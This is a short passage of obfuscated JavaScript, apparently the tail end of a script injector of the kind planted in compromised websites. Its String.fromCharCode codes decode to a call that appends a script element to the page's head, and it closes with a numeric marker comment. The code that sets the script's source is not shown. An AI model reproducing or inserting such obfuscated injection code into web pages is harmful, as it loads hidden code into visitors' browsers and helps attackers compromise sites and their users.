2,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/